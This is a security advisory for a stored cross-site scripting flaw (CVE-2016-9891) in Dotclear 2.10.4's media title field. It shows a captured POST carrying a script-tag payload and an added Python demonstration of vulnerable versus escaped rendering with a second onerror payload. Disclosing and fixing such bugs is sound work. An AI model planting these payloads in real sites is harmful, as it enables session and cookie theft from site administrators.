[CVE-2016-9891] Dotclear – XSS Vulnerability in Version 2.10.4
Tested Version: 2.10.4, released 02.11.2016
Vulnerability Type: Cross-Site Scripting (CWE-79)
Description: The project’s purpose is to provide a user-friendly tool allowing anyone to publish on the web, regardless of their technical skills. (copied from https://dotclear.org/about#undefined)
There is a stored XSS vulnerability in the /dotcl/admin/media_item.php page (/dotcl/ is the path of the test installation).
When an authenticated user of Dotclear renames a media file's title, the following POST request is sent to the server:
POST /dotcl/admin/media_item.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/dotcl/admin/media_item.php?id=4&plugin_id=&popup=0&select=0
Cookie: sidebar-pref=null; dcxd=0408528968495153b0822146207aaaa66d0118f0; s9y_9afefbce28571f388f27f61da1993391=u4l95320lc39fen9n2f8o04jm5
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 201

media_file=testimage.png&media_title=<script>alert(0)</script>.png&media_dt=2016-11-25 19:12&popup=0&select=0&post_id=&id=4&xd_check=8850df45055dfadff791dfbbbd25ed16a16aa3ae
The media_title parameter is stored without being sanitized and is later written into admin pages without HTML escaping, so it is vulnerable to stored XSS.
The payload is executed whenever an authenticated user navigates to the /dotcl/admin/media.php page (the media list).
The media.php page is also loaded when embedding an image or adding an attachment under Entries, so the payload triggers there as well.
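The following is an added example, not code from Dotclear or from the advisory's author. It reproduces the bug class behind this advisory on a small scale: the media title from the captured POST is stored and then interpolated verbatim into a media-list row (the vulnerable rendering), beside the same row rendered with context-aware HTML escaping (the fix). The row template is a hypothetical stand-in for Dotclear's real markup, the request body is constructed from the captured request above, and the attribute-breaking title is a constructed second input that is not part of the advisory; it is included to show why escaping quotes matters when the same value also lands in an attribute.

```python
"""Added example, not code from Dotclear or from the advisory's author.

Shows the stored XSS bug class behind CVE-2016-9891: a media title submitted
through the media_item.php form is stored and later written into the admin
media list without HTML escaping. ROW_TEMPLATE is a hypothetical stand-in for
Dotclear's real markup; the request body is constructed from the captured POST.
"""
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs

# Constructed: the form body of the captured POST, percent-encoded as a
# browser sends it (the advisory shows it decoded).
CAPTURED_BODY = (
    "media_file=testimage.png"
    "&media_title=%3Cscript%3Ealert%280%29%3C%2Fscript%3E.png"
    "&media_dt=2016-11-25+19%3A12&popup=0&select=0&post_id=&id=4"
    "&xd_check=8850df45055dfadff791dfbbbd25ed16a16aa3ae"
)

# Constructed, not from the advisory: a title aimed at the attribute context
# of the same sink, to show why quote=True matters in render_row_fixed().
ATTRIBUTE_BREAKING_TITLE = 'x" onerror="alert(0)'

# Hypothetical media-list row: the title appears both as text and inside an
# attribute, two different HTML contexts that must both be escaped.
ROW_TEMPLATE = (
    '<tr><td><a href="media_item.php?id={id}">{title}</a></td>'
    '<td><img src="{file}" alt="{title}"></td></tr>'
)


def parse_media_form(body: str) -> dict:
    """Decode the urlencoded body into single-valued fields, as the server sees them."""
    fields = parse_qs(body, keep_blank_values=True)
    return {k: v[0] for k, v in fields.items()}


def render_row_vulnerable(item: dict) -> str:
    """The bug class: stored values are interpolated into markup verbatim."""
    return ROW_TEMPLATE.format(
        id=item["id"], title=item["media_title"], file=item["media_file"]
    )


def render_row_fixed(item: dict) -> str:
    """The fix: every untrusted value is HTML-escaped before output.
    quote=True also encodes " and ', so an attribute value cannot be closed early."""
    def esc(value: str) -> str:
        return html.escape(value, quote=True)

    return ROW_TEMPLATE.format(
        id=esc(item["id"]), title=esc(item["media_title"]), file=esc(item["media_file"])
    )


class _MarkupAudit(HTMLParser):
    """Collects the element names and on* event handlers a browser would act on."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: list = []
        self.handlers: list = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.handlers += [name for name, _ in attrs if name.startswith("on")]


def active_script(rendered: str) -> dict:
    """Regression check for the media list: counts <script> elements and inline
    event handlers in the rendered HTML. Both must be zero for any stored title."""
    audit = _MarkupAudit()
    audit.feed(rendered)
    return {
        "script_tags": audit.tags.count("script"),
        "event_handlers": len(audit.handlers),
    }


if __name__ == "__main__":
    item = parse_media_form(CAPTURED_BODY)
    print("stored title:", item["media_title"])
    print("vulnerable:", active_script(render_row_vulnerable(item)))
    print("fixed:     ", active_script(render_row_fixed(item)))
    attr_item = dict(item, media_title=ATTRIBUTE_BREAKING_TITLE)
    print("vulnerable (attribute context):", active_script(render_row_vulnerable(attr_item)))
    print("fixed (attribute context):     ", active_script(render_row_fixed(attr_item)))
```

With the advisory's payload the vulnerable row yields one live script element, while the escaped row yields none; with the constructed attribute-breaking title the vulnerable row instead yields an onerror handler on the img element, which html.escape with quote=True also neutralizes. The audit function can be reused as a regression test for any admin page that echoes stored media metadata.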
Because the payload persists in the stored media title, any authenticated user who can rename media can plant it, and it executes in the browser of every authenticated user who later opens the media list, including administrators. The injected script runs in the context of the trusted site: it can read any cookies, session tokens, or other sensitive information the browser holds for that site, and it can rewrite the contents of the HTML page. Exploitation is also made easy with BeEF (The Browser Exploitation Framework).
Update to the latest version, which is 2.11.1 (the issue has been fixed since 2.11), see https://dotclear.org/blog/post/2016/12/28/Dotclear-2.11
Vulnerability found: 26.11.2016
Vendor informed: 05.12.2016
Response by vendor: 05.12.2016
Fix by vendor: 05.12.2016
Patched version released: 28.12.2016
Public Advisory: 29.12.2016